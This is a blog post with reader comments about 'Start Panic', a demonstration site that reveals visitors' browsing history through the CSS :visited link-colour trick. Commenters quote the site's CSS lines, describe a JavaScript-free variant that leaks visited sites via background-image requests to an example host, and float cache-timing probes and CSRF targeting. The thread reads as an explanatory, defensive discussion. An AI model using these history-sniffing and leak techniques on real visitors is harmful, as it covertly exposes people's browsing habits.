![[ t ]](/images/structural/icon_twitter.gif){kind=icon}
Start Panic
Start Panicking!: Think your browsing history is secure? It’s not.
Go here, and press the button.
If someone knows how they’re doing this, do tell.
Comments
I've not looked at the code (yet) but I suspect they're putting links in the DOM and then checking their colour via CSS. It works because browsers change the link colours for websites that you've previously visited.
Yep, a quick look at the code shows:
p.doc.write("a{color: #000000; display:none;}"); p.doc.write("a:visited {color: #FF0000; display:inline;}");
So it's only showing websites that have been visited. It also explains why they only seem to be top level domains it finds, and all reasonably popular. Still it's quite impressive how many it can find (it must have a huge database of domains).
That is damn clever!
Their db contains 100,000 entries: http://startpanic.com/db/db_en.txt (1.4M)
Neat trick!
javascript running on MY machine can find my visited history.
it's not like this is serverside technology.
clever, but not a security issue.
@jonathan It isn't a server side script, but it doesn't mean it's not a security issue. Script posts its results to server, effectively notifying server about sites you've visited.
not too worried about it. using NoScript, so nothing happened until i let it run.
I wouldn't be too fast to dismiss this as minor.
@jcg: That's good, and I use NoScript too, but what about all the people who don't? @jonathan: Imagine a less-than-ethical business which would utilize this idea, coupled with a targeted database to determine browsing habits of their customers. Imagine advertisers using this as spyware. Yes it is client-side, but it doesn't require any user input to run, and the results could easily be sent back to a database, as Slobodan pointed out.
There are many nasty uses for this, if you put your mind to it.
noscript alone won't protect you; you can load remote images in css without the help of javascript ("background: url('http://www.example.com/www.yahoo.com');")
also see: http://ha.ckers.org/weird/CSS-history.cgi for some people who were doing this 2.5 years ago
As some security experts have pointed out, this is good for determining if a particular CSRF may be appropriate for the visitor.
I'm thinking it wouldn't be difficult to load some hidden images from other sites (bankofamerica.com/global/images/new_Banklogo.gif) and find the load time to determine if it was cached and displayed versus downloaded and displayed.
There's a better version at http://linuxbox.co.uk/stealing-browser-history-with-javascipt-and-css.php - a lot faster and doesn't make my browser hang like SP does
Add Comment
- The $10,000 Bike by Bob, 4 hours, 34 minutes ago
- Island Inkjet by VG, 7 hours, 12 minutes ago
- Right-Click Command Prompt Hack by realist, 21 hours, 18 minutes ago
- LightKeeper Pro by Don, 1 day, 6 hours ago
- Why Windows Sucks by Jethro, 1 day, 10 hours ago
- Show 5 more »
- Gadgetopia on Kindle by Deane in 2007
- Website-Inspired Art by Dave in 2007
- Wikipedia Brown and The Case of the Captured Koala by Joe in 2006
- Drinking From a Fire Hose by Deane in 2006
- Why People Love Josh Clark by Deane in 2006
- Show 20 more »